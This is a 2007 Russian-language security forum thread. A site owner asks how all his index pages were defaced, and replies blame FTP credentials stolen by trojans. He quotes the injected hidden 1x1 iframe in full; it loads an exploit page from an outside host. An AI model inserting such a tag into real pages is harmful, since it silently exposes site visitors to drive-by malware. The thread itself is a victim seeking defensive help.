Security Lab



Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти  
Форум » Взлом и защита » Уязвимости
Страницы: 1
RSS
Вчера хакнули. Разрулим проблемку?
 
#1
Это нравится:0Да/0Нет
22.03.2007 16:48:06
Всем привет,

собстно, вчера все мои индексные страницы задефейсели и прописали:
Цитата
<!-- ~ --><iframe style="border: none" width="1" height="1" src="http://pynet.info/exp/index.php" style="border: 0;"></iframe><!-- ~ -->
... изначально подумал что где то уязвимость в скрипте, но сайт был расположен на моём ресселлерском аке. Как оказалось все 7 сайтов (все 7 - index.php) были заменены на iframe...   4 сайта были на простых статестических страницах без БД... что это? ведь немогли никак поламать простую страницу.

У себя смотрел на трояны,  вирусы и прочее... все чисто.  Как это могло произойти?
Прошу все мысли по поводу отпишитесь. Возможно кто то пережил подобное.

P.S. Если не в ту тему запостил, простите грешного так как на форуме раньше участия не принимал.
 
 
 
#2
Это нравится:0Да/0Нет
22.03.2007 17:48:40
Поломали один из сайтов на хостинге и через него все остальные поломали.
Взлом скорее всего либо через дырявый скрипт, либо через FTP.
сейчас появились клиентские трояны которые меняют index.html на подключенных FTP серверах
т.е. сервер чист, а клиент кто с ним работает заражен вирусом.
Хочешь быть мудрым? Не желай всего, что видишь; не верь всему, что слышишь; не говори всего, что знаешь; не делай всего, что умеешь, а только то, что полезно.
 
 
 
#3
Это нравится:0Да/0Нет
22.03.2007 18:00:57
Цитата
Александр Антипов пишет:
сейчас появились клиентские трояны которые меняют index.html на подключенных FTP серверах
т.е. сервер чист, а клиент кто с ним работает заражен вирусом.

Именно так и скорее всего было, последнее время не у одного хостера про такое слышал, ломают сами клиенты при том в логах фтп абсолютно чисты логин/пароль от клиента и загрузка своей index странички с внедренным тэгом iframe, при этом троянец не обнаруживался многими антивирусами с последними апдейтами.
 
 
 
#4
Это нравится:0Да/0Нет
22.03.2007 18:03:03
Александр  спасибо Вам за ответ.

Просто мне в данной ситуации хотелсь выяснить, то ли это я где-то одним словом "лоханулся", то ли это грешок хостера. Или что-то другое. И как предостеречь себя от этого в будущем.
Ведь согласитесь, что не приятно когда такое происходит.
 
 
 
#5
Это нравится:0Да/0Нет
22.03.2007 18:07:25
В случае если проблема в хостере (этим грешит например валуехост и мелкие хостеры) то единственный выход сменить хостера.
Ну и самому иметь ввиду очевидные правила - антивирус, сложные пароли, регулярная их смена.

Не пользоваться бесплатными почтовыми ящиками (типа mail.ru) - если других нет то уж лучше gmail.com или hotmail.com.
Хочешь быть мудрым? Не желай всего, что видишь; не верь всему, что слышишь; не говори всего, что знаешь; не делай всего, что умеешь, а только то, что полезно.
 
 
 
#6
Это нравится:0Да/0Нет
25.03.2007 13:11:32
а прикольный вирус кто то придумал же  :D  :D
 
 
 
#7
Это нравится:0Да/0Нет
28.03.2007 18:37:26
Скорее всего вы подхватили троянчига  :o
 
 
 
#8
Это нравится:0Да/0Нет
28.03.2007 19:13:31
Подобная проблема обсуждалась тут
 
 
 
Страницы: 1
Читают тему